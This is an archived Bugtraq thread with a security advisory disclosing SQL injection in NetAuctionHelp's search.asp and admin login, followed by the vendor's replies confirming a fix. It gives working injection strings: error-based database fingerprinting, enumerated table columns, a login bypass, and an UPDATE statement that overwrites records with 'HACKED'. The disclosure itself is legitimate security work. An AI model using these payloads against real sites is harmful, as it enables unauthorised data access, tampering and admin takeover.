Re: Re: Aria-Security.net: NetAuctionHelp SQL Injection
Thank you for finding this out. This is issue has been fixed and applied to our NetAuctionHelp software and Classified Ads software as well as our customers using it. NetAuctionHelp Support Team no-reply-15 wrote: > > Hello, > > I got you another one, > > there's the same problem with your admin page. just try 'having 1=1-- as > user login. > > > > Regards, > > The-0utl4w > > > > > > P.S: see our Advisory on your other product (ads) > > -- View this message in context: http://www.nabble.com/Aria-Security.net%3A-NetAuctionHelp-SQL-Injection-tf4857189.html#a14188418 Sent from the Bugtraq mailing list archive at Nabble.com.
Re: Re: Aria-Security.net: NetAuctionHelp SQL Injection
Hello, I got you another one, there's the same problem with your admin page. just try 'having 1=1-- as user login. Regards, The-0utl4w P.S: see our Advisory on your other product (ads)
Re: Aria-Security.net: NetAuctionHelp SQL Injection
This issue is fix. Thanks
Aria-Security.net: NetAuctionHelp SQL Injection
Aria-Security Net Original Advisory @ http://aria-security.net/forum/showthread.php?p=1099 Vendor: http://www.netauctionhelp.com PoC: search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=[SQL INJECTION] search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch='having 1=1-- search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@servername)-- search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@version)-- tblAd.id tblAd.aspectratio tblAd.title tblAd.imagepath tblAd.startdate tblAd.enddate tblAd.id_seller tblAd.descr -1' UPDATE tblAd set descr= 'HACKED' Where(ID= '1');-- this code with update itemdetl.asp?id=1 Credit goes to Aria-Security.Net Greetz: AurA
